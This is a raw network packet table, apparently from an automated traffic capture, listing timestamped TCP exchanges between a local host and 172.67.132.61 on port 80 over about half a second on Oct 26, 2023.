                                                                              Oct 26, 2023 09:48:08.132932901 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.226470947 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.226712942 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.226712942 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.320139885 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.523338079 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.523372889 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.523436069 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.523519993 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.523545027 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.523617029 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.523636103 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.523684025 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.523737907 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.523752928 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.523823023 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.523866892 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.523871899 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.523917913 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.523962975 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.523974895 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.524015903 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.524059057 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.524076939 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.524167061 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.524216890 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.524221897 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.524327993 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.524379969 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.524400949 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.524461985 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.524507999 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.524523020 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.524595976 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.524641037 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.524674892 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.525059938 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.525111914 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.525120020 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.525155067 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.525201082 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.525216103 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.525250912 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.525298119 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.525636911 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.525674105 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.525698900 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.525728941 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.525752068 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.525806904 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.525824070 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.525875092 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.525921106 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.525934935 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.526590109 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.526638031 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.526709080 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.526726961 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.526778936 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.526832104 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.526875973 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.526935101 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.526943922 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.526990891 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.527040005 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.527549028 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.527625084 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.527641058 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.527674913 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.527726889 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.527753115 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.527776957 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.527823925 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.527865887 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.527868986 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.528506994 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.528563976 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.528677940 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.528800964 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.528852940 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.528856993 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.528918982 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.528933048 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.528965950 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.529072046 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.529123068 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.529366016 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.529381990 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.529432058 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.529432058 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.529495001 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.529534101 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.529535055 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.529601097 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.529637098 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.529644966 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.530354023 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.530368090 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.530397892 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.530441999 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.530484915 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.530493021 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.530549049 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.530584097 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.530590057 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.530670881 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.530714989 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.531193018 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.531243086 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.531286955 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.531307936 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.531403065 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.531451941 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.531471014 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.531543970 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.531584024 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.531639099 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.532133102 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.532186985 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.532249928 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.532308102 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.532355070 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.532406092 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.532480955 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.532520056 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.532568932 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.532634020 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.532675982 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.533037901 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.533082962 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.533130884 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.533147097 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.533200979 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.533260107 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.533276081 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.533344984 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.533380985 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.533428907 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.534013987 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.534085989 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.534178972 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.534259081 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.534301996 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.534368038 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.534461021 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.534533024 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.534581900 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.534599066 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.534657001 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.534673929 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.535022020 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.535063028 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.535068035 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.535136938 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.535178900 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.535345078 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.535417080 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.535490990 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.535520077 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.535537958 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.535582066 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.539541006 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.539613008 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.539663076 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.539663076 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.539710045 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.539758921 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.539766073 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.539817095 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.539856911 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.539887905 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.540019989 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.540060997 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.540090084 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.540129900 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.540173054 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.540227890 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.540285110 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.540327072 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.540334940 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.540389061 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.540446997 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.540463924 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.540622950 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.540668964 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.540678024 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.540747881 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.540797949 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.540828943 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.540925980 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.540941000 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.540967941 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.541213036 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.541260004 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.541322947 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.541384935 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.541429043 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.541450024 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.541491032 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.541539907 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.541582108 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.544809103 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.544871092 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.544938087 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.544981956 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.545025110 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.545039892 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.545109987 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.545151949 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.545191050 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.545301914 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.545341015 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.545363903 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.545511007 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.545555115 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.545581102 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.545665979 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.545703888 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.545748949 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.545839071 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.545877934 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.545938969 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.546152115 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.546211958 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.546240091 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.546310902 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.546365976 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.546390057 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.546499014 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.546514988 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.546551943 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.546580076 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.546622038 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.546627998 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.546672106 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.546713114 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.546725035 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.546777964 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.546827078 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.546855927 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.546931982 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.546972990 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.547029972 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.547121048 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.547163963 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.547319889 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.547434092 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.547472954 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.547492981 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.547547102 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.547586918 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.547728062 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.547769070 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.547796965 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.547811031 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.547877073 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.547918081 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.548043966 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.548075914 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.548116922 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.548140049 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.548192978 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.548243046 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.548301935 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.548336983 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.548396111 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.548441887 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.548823118 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.548866987 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.548870087 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.548949003 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.549007893 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.549012899 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.549120903 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.549160004 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.549185038 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.549269915 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.549309969 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.549751997 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.549825907 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.549866915 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.549904108 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.549979925 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.550018072 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.550051928 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.550164938 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.550203085 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.550236940 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.550764084 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.550821066 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.550883055 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.550972939 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.551011086 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.551043034 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.551153898 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.551197052 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.551223993 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.551296949 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.551337957 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.551392078 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.551480055 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.551523924 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.551563025 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.551584959 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.551624060 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.551639080 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.551693916 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.551740885 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.551740885 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.551942110 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.551975012 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.551980972 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.616672039 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.616703033 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.616741896 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.617086887 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.617136002 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.617141008 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.617188931 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.617233038 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.617239952 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.617295027 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.617338896 CEST4977280192.168.2.7172.67.132.61
                                                                              Oct 26, 2023 09:48:08.617352962 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.617739916 CEST8049772172.67.132.61192.168.2.7
                                                                              Oct 26, 2023 09:48:08.617783070 CEST4977280192.168.2.7172.67.132.61
